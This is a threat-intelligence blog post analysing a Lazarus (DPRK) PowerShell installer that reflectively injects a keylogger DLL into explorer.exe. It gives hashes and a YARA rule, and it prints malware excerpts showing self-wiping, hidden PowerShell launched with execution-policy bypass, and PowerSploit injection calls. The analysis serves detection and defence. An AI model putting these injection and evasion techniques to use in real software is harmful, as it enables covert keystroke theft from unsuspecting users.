Let's Learn: Dissecting Lazarus PowerShell PowerRatankba.B, Installer Script & Keylogger: Pakistan Version

Goal: Document and review the latest Lazarus PowerRatankba.B, PowerShell installer script leading to the 64-bit keylogger version (Pakistan version).

2019-01-25: #Lazarus #DPRK #Malware Sample Spotted#PowerShell exploitation/installer script -> “shell_script” & base64-encoded “capture_x64.dll” keylogger (compilation: Sept 24, 2018) |
Upload from Pakistan
MD5: 5cc28f3f32e7274f13378a724a5ec33a
cc @KevinPerlow /@DrunkBinary pic.twitter.com/6DwNhBSKqL
— Vitali Kremez (@VK_Intel) January 25, 2019

Lazarus PowerShell PowerRatankba.B “REG_LOCALDATA.ps1”(Pakistan)
MD5: c9ed87e9f99c631cda368f6f329ee27e
Lazarus PowerShell installer script “hm.ps1” (Pakistan)
MD5: 5cc28f3f32e7274f13378a724a5ec33a
Keylogger 64-bit (x64) “capture_x64.dll’(Pakistan)
MD5: 2025D91C1CDD33DB576B2C90EF4067C7
I. Background & Executive Summary
II. PowerShell PowerRatankba.B “REG_LOCALDATA.ps1” (Pakistan)
III. Lazarus PowerShell Installer Script (Pakistan)
A. Main Code Flow
B. “DoProcess” Function
C. “shell_script”
IV. Lazarus Keylogger 64-bit (x64) “capture_x64.dll’ (Pakistan)
V. Yara Signature
I. Background & Executive Summary
This analysis is a continuation of the reporting on the recent Lazarus toolkits. It is notable that the latest discovered PowerRatankba.B toolkit, uploaded from Pakistan, is almost identical to the Chilean Redbanc incident with the slightly different hardcoded URI structure ending on “cgetpsa” and “cgetruna” on the same server, while the recent uploaded Lazarus PowerShell installer (and its keylogger) bears similarity to the ones shared by the Vietnamese CERT. It is possible that the Lazarus group was targeting financial institutions both in Chile and Pakistan while deploying the same command-and-control server and before in Vietnam.
Before diving deeper into the Lazarus PowerShell installation and keylogger analysis, I highly recommend reading the Norfolk Infosec blog titled “A Lazarus Keylogger- PSLogger” detailing the Lazarus older version of the similar script, installation, and the keylogger DLL component. As noted, the script and its installation do not contain the command-and-control protocol, which likely means that the group exfiltrates the screenshot and keylogger information at a later point via other means. 
I have also uploaded MISP JSON and CSV associated with the Lazarus tools (Pakistan) to GitHub k-vitali/apt_lazarus_toolkits for detection and mitigation of this threat.
II. PowerShell PowerRatankba.B “REG_LOCALDATA.ps1” (Pakistan)
The latest identified PowerRatankba.B, uploaded from Pakistan, represents a reconnaissance Lazarus tool with the almost identical script and logic to the Chilean Redbanc incident (with the same server) with the exception of the URI structure and lack of the commented additional server.
III. Lazarus PowerShell Installer Script “hm.ps1” (Pakistan)
A. Main Code Flow
The main function setup obtains the process list leveraging the native PowerShell command obtaining the current process id list with process names via “Get-Process | Select-Object id,name” then convert the process name to lower case and sets the boolean “$bIsInjected=$false” and then if the process name matches ‘explorer’, the malware enters “DoProcess function passing -Target_PID process id of the process, then exiting.
The main script setup is as follows:
////// Lazarus PowerShell installer main flow //////
OwnPath = $MyInvocation.MyCommand.Path;
$filesize = (Get-Item $OwnPath).length
$resetBuf = New-Object byte $filesize
[System.IO.File]::WriteAllBytes($OwnPath, $resetBuf)
Remove-Item -Path $OwnPath -Force -Recurse

$cnt_read = 0;
$process_list = Get-Process | Select-Object id,name
foreach($iter in $process_list)
$process_name = $iter.name.ToLower();
$bIsInjected = $false;
if($process_name.CompareTo(‘explorer’) -eq 0)
$ProID = $iter.Id
DoProcess -Target_PID $ProID
$ProcessListArray += $ProID
B. “DoProcess” Function
Essentially, the  “DoProcess” function passess the string type parameter $Target_PID and creating a file path with random characets as “C:\windows\temp\tmp[0-9A-F].ps1”.
///// Lazarus PowerShell ‘DoProcess’ Function //////
Function DoProcess
$szFileName = ‘C:\windows\temp\tmp’+ -join ((48 … 57) + (65 … 70) |
Get-Random -Count 4 | % { [char]$_ }) + ‘.ps1’;
[String]$szCode = ‘$SScript = "’ + $shell_script + '”;
[String]$NewStr = [System.Text.Encoding]::ASCII.GetString([System.Convert]
“’ + $InputString + '”);$NewStr=$NewStr.Replace(“PROCESSID”, “’ + $Target_PID + '”);
$NewBlock = [Scriptblock]::Create($NewStr);Invoke-Command -ScriptBlock $NewBlock;';

$szCode | Out-File -Encoding ascii $szFileName;
[String]$szArgList = ‘-ep bypass -file ’ + $szFileName;
$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden - ArgumentList $szArgList;
The malware parses “shell_script”, replaces “|” for “a”, and base64 decodes and replaces “EXECUTION_BINARY” valuew with the base64 version of the keylogger 64-bit (x64) DLL version. Additinally, it replaces “PROCESSID” with argument “$Target_PID” writing to the resulting script to the tmp file and executing it via “Start-Process powershell.exe -PassThru -WindowStyle Hidden - ArgumentList -ep bypass -file C:\windows\temp\tmp[0-9A-F].ps1”.
C. “shell_script” 
The code itself is a PowerSploit’s PowerShell “Invoke-ReflectivePEInjection” reflectively injects a DLL into a remote process decoding the DLL base64 to binary.
///// Lazarus PowerShell ‘shell_script’ Excerpt ////
[String]$InputString = ‘EXECUTION_BINARY’;
[String]$idProcess = ‘PROCESSID’;
$injectionErrorCode = ‘’;
$global:cmdRes = 0;
function Invoke-ReflectivePEInjection
Function Get-Win32Types
Function Get-Win32Constants
Function Get-Win32Functions
Function Sub-SignedIntAsUnsigned
Function Add-SignedIntAsUnsigned
Function Compare-Val1GreaterThanVal2AsUInt

$PEBytes = [System.Convert]::FromBase64String($InputString);
if( $idProcess -eq 0)
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType
        Void -ForceASLR;
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType
        Void -ForceASLR -ProcId $idProcess;
The malware will force the use of address space layout randomization (ASLR) on the PE loaded even if the PE indicates it does not support ASLR. Additionally, the malware passes -FuncReturnType the return type of the function being called in the DLL; the malware passes -ProcId parameter substituting $idProcess = ‘PROCESSID’ from the main flow loop code and substituting $InputString = ‘EXECTUION_BINARY’ to the dropped Lazarus 64-bit keylogger “capture_x64.dll”.
IV. Lazarus Keylogger 64-bit (x64) "capture_x64.dll’
The keylogger malware is 64-bit with the compilation timestamp Monday, September 24 09:44:33 2018 UTC. It contains the same screenshot library, export function “Process,” same XZip library as the reported Vietnamese and Pakistani keylogger with the same setup as reported in detail by Norfolk Infosec.
V. Yara Signature: Keylogger
rule APT_Lazarus_Keylogger {
description = “Detects possible Lazarus Keylogger”
author = “@VK_Intel
date = “2019-01-25”
$s0 = “%s%s” fullword ascii wide
$s1 = “[ENTER]” fullword ascii wide
$s2 = “[EX]” fullword ascii wide
$s3 = “%02d:%02d” fullword ascii wide

$dll0 = “PSLogger.dll” fullword ascii wide
$dll1 = “capture_x64.dll” fullword ascii wide
$exe = “PSLogger.exe” fullword ascii wide

uint16(0) == 0x5a4d and all of ($s*) and (1 of ($dll*) or $exe)

Article Link: https://www.vkremez.com/2019/01/lets-learn-dissecting-lazarus.html